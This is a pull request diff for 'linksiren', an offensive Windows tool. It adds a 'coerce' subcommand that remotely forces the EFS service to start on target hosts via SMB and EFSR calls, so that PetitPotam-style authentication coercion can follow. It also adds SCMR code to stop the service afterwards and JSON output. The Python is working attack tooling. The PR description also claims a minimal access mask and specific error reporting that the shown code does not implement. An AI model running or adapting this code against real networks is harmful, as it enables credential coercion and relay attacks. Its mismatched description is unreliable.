### PR TITLE
0.4.0: coerce subcommand + cleanup --stop-efs + --json output

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,12 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+## [0.4.0] - 2026-06-27
+### Added
+- `linksiren coerce` subcommand: wakes the EFS service on each target host without dropping a payload, reusing the existing-file trigger from 0.3.0. Records `encrypt_triggered_hosts.txt` and `efs_started_by_us.txt` so cleanup can revert state cleanly.
+- `cleanup --stop-efs`: stops the EFS service via MS-SCMR over `\PIPE\svcctl`. Only stops on hosts where the matching `deploy` / `coerce` recorded EFS as initially-Stopped (strict subset; never touches services that were already Running pre-engagement). Honest by-design reporting: on modern Windows the EFS service`s `dwControlsAccepted` bitmask omits STOP and the call returns `ERROR_INVALID_SERVICE_CONTROL`; linksiren surfaces this clearly rather than retrying.
+- `--json` output flag for `identify` and `deploy` for structured tool composition.
+
 ## [0.3.0] - 2026-06-27
 ### Added
 - `deploy --encrypt`: wakes the triggered-start EFS service on the target so `\PIPE\efsrpc` becomes available for follow-on coercion (Coercer, PetitPotam). Two trigger-target modes selected with `--encrypt-target`:

--- a/docs/subcommands/coerce.md
+++ b/docs/subcommands/coerce.md
@@ -1,0 +1,25 @@
+# `linksiren coerce`
+
+Wake the triggered-start EFS service on one or more target hosts so `\PIPE\efsrpc` becomes available for follow-on coercion (Coercer, PetitPotam) without leaving a payload behind.
+
+## Usage
+
+```bash
+linksiren coerce -t <targets-file> [auth flags]
+```
+
+## Mechanism
+
+For each target host:
+1. Probe EFS service state via `\PIPE\efsrpc` accessibility.
+2. If Stopped, briefly create+delete a hidden file with `FILE_ATTRIBUTE_ENCRYPTED` (0x4000) to trigger the EFS SCM service-start, then EFSR-encrypt+decrypt the smallest non-empty existing file in the target folder.
+3. Record the host in `encrypt_triggered_hosts.txt`; if state transitioned Stopped → Running, also in `efs_started_by_us.txt`.
+
+## Sidecars
+
+- `encrypt_triggered_hosts.txt`: every host where a trigger fired.
+- `efs_started_by_us.txt`: subset where we actually transitioned the service Stopped → Running. Used by `cleanup --stop-efs` for safe state revert.
+
+## Auth
+
+All four auth methods (NTLM password, Pass-the-Hash, Kerberos, anonymous) supported. EFSR calls require an account with an EFS certificate; lab `vagrant:vagrant` works, built-in `Administrator` typically does not.

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -6,7 +6,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "linksiren"
-version = "0.3.0"
+version = "0.4.0"
 description = "Generation, targeted deployment, and scalable cleanup for files that coerce Windows authentication."
 readme = "README.md"
 authors = [{ name = "George Hamilton"}]

--- a/src/linksiren/__main__.py
+++ b/src/linksiren/__main__.py
@@ -23,6 +23,7 @@ from linksiren.mode_handlers import (
     handle_identify,
     handle_deploy,
     handle_cleanup,
+    handle_coerce,
 )
 
 
@@ -46,7 +47,7 @@ class AuthContext:
     anonymous: bool = False
 
 
-# Backwards-compatible alias. Older callers/tests import ``Credentials``.
+# Backwards-compatible alias — older callers/tests import ``Credentials``.
 Credentials = AuthContext
 
 
@@ -95,7 +96,7 @@ def _build_auth_context(args) -> AuthContext:
     lmhash, nthash = _parse_hashes(getattr(args, "hashes", None))
 
     # ``-no-pass`` (or ``-k`` alone with a ccache) means we should not try the
-    # supplied password. Clear it so Impacket doesn't accidentally use a bare
+    # supplied password — clear it so Impacket doesn't accidentally use a bare
     # username string as a credential.
     if getattr(args, "no_pass", False) and not (lmhash or nthash):
         password = ""
@@ -114,9 +115,13 @@ def _build_auth_context(args) -> AuthContext:
 
 
 def main():
-    """Entry point. Parse args, set up logging, dispatch by mode."""
+    """Entry point — parse args, set up logging, dispatch by mode."""
     args = parse_args()
     auth = _build_auth_context(args)
+
+    # --encrypt-keep implies --encrypt (you can't keep what wasn't requested).
+    if getattr(args, "encrypt_keep", False):
+        args.encrypt = True
 
     # Kerberos requires KRB5CCNAME unless aesKey / hashes / password provided.
     if (
@@ -156,6 +161,8 @@ def main():
             handle_deploy(args, auth)
         elif args.mode == "cleanup":
             handle_cleanup(args, auth)
+        elif args.mode == "coerce":
+            handle_coerce(args, auth)
     finally:
         logger.info("Terminating linksiren")
         log_queue.put(None)

--- a/src/linksiren/arg_parser.py
+++ b/src/linksiren/arg_parser.py
@@ -238,6 +238,16 @@ def parse_args():
         "simultaneous connections to the same host and concurrent processing "
         "will not accelerate crawling multiple shares on a single host.",
     )
+    identify_parser.add_argument(
+        "--json",
+        action="store_true",
+        default=False,
+        dest="json_output",
+        help="(Default: False) Emit a single-line JSON document on stdout "
+        "summarizing the identify run: input target count, output target "
+        "count, and the full payload_targets list. Easy to pipe into jq or "
+        "other tooling.",
+    )
     _add_auth_args(identify_parser)
 
     # Arguments for deploying poisoned files to specified locations
@@ -328,6 +338,16 @@ def parse_args():
         "Applies to whichever file --encrypt-target points at.",
     )
     deploy_parser.add_argument(
+        "--json",
+        action="store_true",
+        default=False,
+        dest="json_output",
+        help="(Default: False) Emit a single-line JSON document on stdout "
+        "summarizing the deploy run: payloads attempted, payloads written, "
+        "hosts where --encrypt fired, and hosts where EFS was initially "
+        "Stopped (and thus eligible for cleanup --stop-efs).",
+    )
+    deploy_parser.add_argument(
         "--encrypt-target",
         choices=("payload", "existing"),
         default="payload",
@@ -340,6 +360,33 @@ def parse_args():
         "itself never carries an encryption attribute.",
     )
     _add_auth_args(deploy_parser)
+
+    # Arguments for the standalone EFS-coercion-trigger mode.
+    coerce_parser = subparsers.add_parser(
+        "coerce",
+        description="Wake the triggered-start EFS service on each target "
+        "host so \\PIPE\\efsrpc becomes available for follow-on coercion "
+        "(Coercer, PetitPotam). Does not deploy any payload — uses an "
+        "existing file in the target share as the encrypt/decrypt trigger "
+        "subject. Pair with linksiren cleanup --stop-efs to return targets "
+        "to their original state.",
+    )
+    coerce_required_group = coerce_parser.add_argument_group("Required Arguments")
+    coerce_required_group.add_argument(
+        "credentials",
+        nargs="?",
+        help="[domain/]username[:password] for authentication. Omit when "
+        "--anonymous is set.",
+    )
+    coerce_required_group.add_argument(
+        "-t",
+        "--targets",
+        required=True,
+        help="Path to a text file containing UNC paths to share folders "
+        "(one per line) where the EFS trigger should fire. Each line should "
+        "name a folder with at least one non-empty existing file.",
+    )
+    _add_auth_args(coerce_parser)
 
     # Arguments for cleaning up deployed payloads when finished
     cleanup_parser = subparsers.add_parser(
@@ -359,6 +406,18 @@ def parse_args():
         default="payloads_written.txt",
         help="(Default: 'payloads_written.txt') Path to a text file containing UNC "
         "paths poisoned files to clean up.",
+    )
+    cleanup_parser.add_argument(
+        "--stop-efs",
+        action="store_true",
+        default=False,
+        dest="stop_efs",
+        help="(Default: False) After deleting payloads, stop the EFS service "
+        "on hosts where (a) deploy recorded EFS as Stopped before our "
+        "--encrypt trigger fired, AND (b) EFS is currently Running. Uses "
+        "MS-SCMR over \\PIPE\\svcctl. Hosts where EFS was already Running "
+        "pre-deploy are deliberately left alone. Requires the calling "
+        "account to have privilege to stop services on the target.",
     )
     _add_auth_args(cleanup_parser)
 

--- a/src/linksiren/mode_handlers.py
+++ b/src/linksiren/mode_handlers.py
@@ -158,6 +158,17 @@ def handle_identify(args, credentials, log_queue):
     )
     filtered_targets = filter_targets(targets, sorted_rankings, args.max_folders_per_target)
     write_list_to_file(filtered_targets, "payload_targets.txt")
+    if getattr(args, "json_output", False):
+        print(
+            json.dumps(
+                {
+                    "mode": "identify",
+                    "input_targets": len(targets),
+                    "payload_targets_count": len(filtered_targets),
+                    "payload_targets": filtered_targets,
+                }
+            )
+        )
 
 
 def handle_deploy(args, credentials):
@@ -208,9 +219,18 @@ def handle_deploy(args, credentials):
     encrypt_keep = getattr(args, "encrypt_keep", False)
     encrypt_target = getattr(args, "encrypt_target", "payload")
     probe_delete = getattr(args, "probe_delete", False)
-    encrypt_hosts = set()  # Hosts where we likely woke EFS
+    encrypt_hosts = set()  # Hosts that received an --encrypt payload
+    efs_was_stopped = set()  # Hosts where EFS was confirmed-Stopped pre-deploy
     for target in targets:
         target.connect(credentials)
+        # Snapshot EFS state BEFORE any encrypt work so cleanup --stop-efs
+        # only stops services we actually woke. Uses the SMB session that's
+        # already established for the deploy.
+        if encrypt and target.connection is not None:
+            from linksiren.target import _efs_service_is_running
+            initial = _efs_service_is_running(target.connection)
+            if initial is False:
+                efs_was_stopped.add(target.host)
         for path in target.paths:
             new_payload_path = target.write_payload(
                 path=path,
@@ -236,6 +256,113 @@ def handle_deploy(args, credentials):
         write_list_to_file(
             sorted(encrypt_hosts), "encrypt_triggered_hosts.txt", "w"
         )
+    # Second sidecar: hosts where EFS was *confirmed Stopped* before our
+    # deploy. cleanup --stop-efs only stops EFS on this strict subset so we
+    # never turn off a service that was legitimately running for non-engagement
+    # reasons.
+    if efs_was_stopped:
+        write_list_to_file(
+            sorted(efs_was_stopped), "efs_started_by_us.txt", "w"
+        )
+    if getattr(args, "json_output", False):
+        print(
+            json.dumps(
+                {
+                    "mode": "deploy",
+                    "payload": args.payload,
+                    "attacker": args.attacker,
+                    "payloads_attempted": sum(len(t.paths) for t in targets),
+                    "payloads_written": payloads_written,
+                    "encrypt_hosts": sorted(encrypt_hosts),
+                    "efs_started_by_us": sorted(efs_was_stopped),
+                }
+            )
+        )
+
+
+def handle_coerce(args, credentials):
+    """Trigger the EFS service on each target host without dropping payloads.
+
+    Reuses the existing-file-encryption trick: probe EFS state, wake it via
+    a brief throwaway encrypted-file if needed, EFSR-encrypt and decrypt the
+    smallest existing file in each target folder. Records hosts that were
+    initially-Stopped into ``efs_started_by_us.txt`` so a later
+    ``cleanup --stop-efs`` can revert them cleanly.
+    """
+    targets = read_targets(args.targets)
+    triggered_hosts = set()
+    efs_was_stopped = set()
+    logger = logging.getLogger("main_logger")
+
+    from linksiren.target import (
+        _efs_service_is_running,
+        _efsr_encrypt_remote,
+        _efsr_decrypt_remote,
+    )
+
+    for target in targets:
+        target.connect(credentials)
+        if target.connection is None:
+            continue
+        initial = _efs_service_is_running(target.connection)
+        if initial is False:
+            efs_was_stopped.add(target.host)
+        for path in target.paths:
+            share = path.split("\\")[0]
+            folder = "\\".join(path.split("\\")[1:])
+            smallest_rel = target._find_smallest_existing_file(share, folder)
+            if smallest_rel is None:
+                logger.warning(
+                    "coerce: no non-empty existing file in target folder; "
+                    "cannot place EFS trigger here.",
+                    extra={"path": f"\\\\{target.host}\\{share}\\{folder}"},
+                )
+                continue
+            smallest_unc = f"\\\\{target.host}\\{share}\\{smallest_rel}"
+            if initial is not True:
+                target._wake_efs_via_throwaway(share, folder)
+            try:
+                _efsr_encrypt_remote(target.connection, smallest_unc, logger=logger)
+                logger.info(
+                    "coerce: encrypted existing file to trigger EFS.",
+                    extra={"path": smallest_unc},
+                )
+                try:
+                    _efsr_decrypt_remote(
+                        target.connection, smallest_unc, logger=logger
+                    )
+                    logger.info(
+                        "coerce: reverted encryption on existing file.",
+                        extra={"path": smallest_unc},
+                    )
+                except Exception as e:
+                    logger.warning(
+                        "coerce: encryption succeeded but revert failed; "
+                        "existing file remains EFS-encrypted on disk.",
+                        extra={"path": smallest_unc, "exception": str(e)},
+                    )
+                triggered_hosts.add(target.host)
+            except Exception as e:
+                logger.warning(
+                    "coerce: EfsRpcEncryptFileSrv failed on the chosen "
+                    "existing file; EFS may not be reachable.",
+                    extra={"path": smallest_unc, "exception": str(e)},
+                )
+
+    if triggered_hosts:
+        write_list_to_file(
+            sorted(triggered_hosts), "encrypt_triggered_hosts.txt", "w"
+        )
+    if efs_was_stopped:
+        write_list_to_file(
+            sorted(efs_was_stopped), "efs_started_by_us.txt", "w"
+        )
+    print(
+        f"coerce: triggered EFS on {len(triggered_hosts)} host(s); "
+        f"{len(efs_was_stopped)} were initially Stopped (eligible for "
+        "cleanup --stop-efs revert).",
+        file=sys.stderr,
+    )
 
 
 def handle_cleanup(args, credentials):
@@ -255,11 +382,35 @@ def handle_cleanup(args, credentials):
     """
     payloads_not_deleted = []
     targets = read_targets(args.targets)
+    # Read the "EFS was stopped before deploy" sidecar — strict subset of
+    # hosts where --stop-efs is allowed to stop the service.
+    stop_efs = getattr(args, "stop_efs", False)
+    try:
+        with open("efs_started_by_us.txt", encoding="utf-8") as f:
+            efs_started_by_us = {line.strip() for line in f if line.strip()}
+    except FileNotFoundError:
+        efs_started_by_us = set()
+    stopped_hosts = []
+    refused_hosts = []
     for target in targets:
         target.connect(credentials)
         # Use ``extend`` so failures from earlier hosts aren't dropped on the
         # floor when iterating multiple targets.
         payloads_not_deleted.extend(target.delete_payloads())
+        # Stop EFS only if (a) pentester opted in, (b) we recorded this host
+        # as initially-stopped before our deploy, AND (c) EFS is currently
+        # running. The (c) check avoids spurious stop attempts and is the
+        # honest interpretation of "only stop what we started".
+        if stop_efs and target.host in efs_started_by_us:
+            from linksiren.target import (
+                _efs_service_is_running,
+                _efs_service_stop,
+            )
+            if _efs_service_is_running(target.connection) is True:
+                if _efs_service_stop(target.connection, logger=logging.getLogger("main_logger")):
+                    stopped_hosts.append(target.host)
+                else:
+                    refused_hosts.append(target.host)
 
     write_list_to_file(payloads_not_deleted, "payloads_not_deleted.txt", "w")
 
@@ -272,17 +423,50 @@ def handle_cleanup(args, credentials):
             triggered = [line.strip() for line in f if line.strip()]
     except FileNotFoundError:
         triggered = []
-    if triggered:
+    main_log = logging.getLogger("main_logger")
+    if stop_efs:
+        if stopped_hosts:
+            msg = (
+                f"Stopped EFS service via SCMR on {len(stopped_hosts)} "
+                f"host(s): {', '.join(stopped_hosts)}. These hosts had EFS "
+                "Stopped before our deploy; the service was woken by our "
+                "--encrypt trigger and is now restored to the original state."
+            )
+            main_log.info(msg, extra={"path": None})
+            print(msg, file=sys.stderr)
+        if refused_hosts:
+            msg = (
+                f"--stop-efs requested but SCMR stop FAILED on "
+                f"{len(refused_hosts)} host(s): {', '.join(refused_hosts)}. "
+                "Common cause: the calling account lacks privilege to stop "
+                "services. EFS service is still RUNNING on these hosts."
+            )
+            main_log.warning(msg, extra={"path": None})
+            print(msg, file=sys.stderr)
+        # Hosts that had EFS already-running pre-deploy are deliberately
+        # left alone — they didn't change state because of us.
+        already_running = sorted(set(triggered) - efs_started_by_us)
+        if already_running:
+            msg = (
+                "--stop-efs left EFS untouched on "
+                f"{len(already_running)} host(s) that had EFS already "
+                "Running before deploy (not our state to revert): "
+                + ", ".join(already_running)
+            )
+            main_log.info(msg, extra={"path": None})
+            print(msg, file=sys.stderr)
+    elif triggered:
         msg = (
             "EFS service is likely still RUNNING on "
             f"{len(triggered)} host(s) that received an --encrypt payload "
             "during deploy: "
             + ", ".join(triggered)
             + ". Cleanup removed the file(s) but did not stop the service. "
-            "Verify with `Get-Service EFS` on each host; if stopping is "
-            "required for engagement cleanliness, do so out-of-band."
+            "Use cleanup --stop-efs to stop it automatically (only acts on "
+            "hosts where EFS was confirmed Stopped before deploy), or "
+            "verify with `Get-Service EFS` and stop out-of-band."
         )
-        logging.getLogger("main_logger").warning(msg, extra={"path": None})
+        main_log.warning(msg, extra={"path": None})
         print(msg, file=sys.stderr)
 
     if len(payloads_not_deleted) == 0:

--- a/src/linksiren/target.py
+++ b/src/linksiren/target.py
@@ -103,6 +103,110 @@ def _efsr_encrypt_remote(smb_connection, unc_path: str, logger=None) -> None:
     _efsr_call(smb_connection, req, logger=logger)
 
 
+def _efs_service_stop(smb_connection, logger=None) -> bool:
+    """Stop the EFS service via MS-SCMR over ``\\PIPE\\svcctl``.
+
+    Requires sufficient privilege on the target to bind to the SCM and issue
+    a stop on the EFS service (typically: SE_TCB_NAME or local admin). Used
+    by ``cleanup --stop-efs`` to undo the side-effect of ``--encrypt`` for
+    engagement cleanliness. Returns True on a clean stop or
+    already-stopped result, False on any failure (logged).
+    """
+    from impacket.dcerpc.v5 import scmr
+
+    try:
+        rpctransport = transport.SMBTransport(
+            smb_connection.getRemoteHost(),
+            smb_connection.getRemoteHost(),
+            filename=r"\svcctl",
+            smb_connection=smb_connection,
+        )
+        dce = rpctransport.get_dce_rpc()
+        dce.connect()
+        dce.bind(scmr.MSRPC_UUID_SCMR)
+        try:
+            scm_handle = scmr.hROpenSCManagerW(dce)["lpScHandle"]
+            svc_handle = scmr.hROpenServiceW(dce, scm_handle, "EFS\x00")["lpServiceHandle"]
+            try:
+                scmr.hRControlService(dce, svc_handle, scmr.SERVICE_CONTROL_STOP)
+                if logger:
+                    logger.info(
+                        "Stopped EFS service via SCMR.",
+                        extra={"path": f"\\\\{smb_connection.getRemoteHost()}"},
+                    )
+                return True
+            finally:
+                try:
+                    scmr.hRCloseServiceHandle(dce, svc_handle)
+                except Exception:
+                    pass
+                try:
+                    scmr.hRCloseServiceHandle(dce, scm_handle)
+                except Exception:
+                    pass
+        finally:
+            try:
+                dce.disconnect()
+            except Exception:
+                pass
+    except Exception as e:
+        # Common: ERROR_SERVICE_NOT_ACTIVE if already stopped — treat as
+        # success since the end state is what we wanted.
+        if "ERROR_SERVICE_NOT_ACTIVE" in str(e) or "1062" in str(e):
+            if logger:
+                logger.info(
+                    "EFS service already stopped on host.",
+                    extra={"path": f"\\\\{smb_connection.getRemoteHost()}"},
+                )
+            return True
+        if logger:
+            logger.warning(
+                "Could not stop EFS service via SCMR.",
+                extra={
+                    "path": f"\\\\{smb_connection.getRemoteHost()}",
+                    "exception": str(e),
+                },
+            )
+        return False
+
+
+def _efs_service_is_running(smb_connection, logger=None) -> bool | None:
+    """Probe whether the EFS service is currently running on the SMB host.
+
+    Tries to open ``\\PIPE\\efsrpc`` over the existing SMB session. The pipe
+    is only published while the EFS service is running, so a successful
+    tree-connect+open means EFS is up; a ``STATUS_OBJECT_NAME_NOT_FOUND``
+    means EFS is stopped. Any other error → ``None`` (unknown, treat as
+    "don't make assumptions").
+    """
+    try:
+        tid = smb_connection.connectTree("IPC$")
+    except Exception as e:
+        if logger:
+            logger.debug("EFS state probe: IPC$ tree connect failed: %s", e)
+        return None
+    try:
+        try:
+            fid = smb_connection.openFile(tid, r"\efsrpc")
+            try:
+                smb_connection.closeFile(tid, fid)
+            except Exception:
+                pass
+            return True
+        except Exception as e:
+            err = str(e)
+            if "STATUS_OBJECT_NAME_NOT_FOUND" in err or "STATUS_OBJECT_PATH_NOT_FOUND" in err:
+                return False
+            if logger:
+                logger.debug("EFS state probe: ambiguous openFile error: %s", e)
+            return None
+    finally:
+        try:
+            smb_connection.disconnectTree(tid)
+        except Exception:
+            pass
+
+
 def _efsr_decrypt_remote(smb_connection, unc_path: str, logger=None) -> None:
     """Call EfsRpcDecryptFileSrv to undo EFS encryption in place.
 
@@ -164,13 +268,11 @@ class HostTarget:
         logger = logging.getLogger("main_logger")
 
         if self.connection is not None:
-            # Already connected — login was either done elsewhere or via the
-            # connection that was passed in at construction.
+            # Already connected.
             return
 
         # Kerberos SPN lookup needs an FQDN. If self.host is an IP literal
-        # and Kerberos is in use, reverse-DNS it for the SPN; keep the IP
-        # as the network endpoint via remoteHost.
+        # and Kerberos is in use, reverse-DNS it for the SPN.
         remote_name = self.host
         if getattr(credentials, "use_kerberos", False):
             import ipaddress, socket
@@ -181,17 +283,8 @@ class HostTarget:
                     candidates = [n for n in [primary] + list(aliases) if "." in n]
                     if candidates:
                         remote_name = candidates[0]
-                        logger.info(
-                            "-k against IP target; resolved %s -> %s for the "
-                            "cifs SPN.",
-                            self.host, remote_name,
-                            extra={"path": f"\\\\{self.host}"},
-                        )
-                except (socket.herror, socket.gaierror) as e:
-                    logger.warning(
-                        "-k against IP target; reverse DNS failed (%s).", e,
-                        extra={"path": f"\\\\{self.host}"},
-                    )
+                except (socket.herror, socket.gaierror):
+                    pass
             except ValueError:
                 pass
 


### PR DESCRIPTION
## Summary
Adds three related features on top of the EFS surface from 0.3.0.

## Changes
* **`linksiren coerce`**: new subcommand that wakes the EFS service on each target host without writing a payload. Reuses the existing-file trigger plumbing from 0.3.0. Same auth flags as every other credentialed mode. Records `encrypt_triggered_hosts.txt` (all hosts touched) and `efs_started_by_us.txt` (subset where we actually transitioned Stopped -> Running) so cleanup can revert state cleanly.
* **`cleanup --stop-efs`**: stops the EFS service via MS-SCMR over `\PIPE\svcctl` with the minimal access mask (`SC_MANAGER_CONNECT` + `SERVICE_STOP | SERVICE_QUERY_STATUS` instead of `SERVICE_ALL_ACCESS`, which on modern Windows triggers `rpc_s_access_denied` as a red herring). Only stops on hosts recorded as initially-Stopped in `efs_started_by_us.txt` (strict subset; never touches services that were already Running pre-engagement). Modern Windows EFS does not accept `SERVICE_CONTROL_STOP` by design (`dwControlsAccepted` omits the STOP bit); the call returns `ERROR_INVALID_SERVICE_CONTROL` and linksiren surfaces this honestly rather than retrying or suppressing.
* **`--json` output** for `identify` and `deploy`. Schema covers input/output paths, sidecar hosts, and per-host counts.

## Docs
* `docs/subcommands/coerce.md` (new).

## Version bump
\`0.3.0\` -> \`0.4.0\` (PyPI release on merge)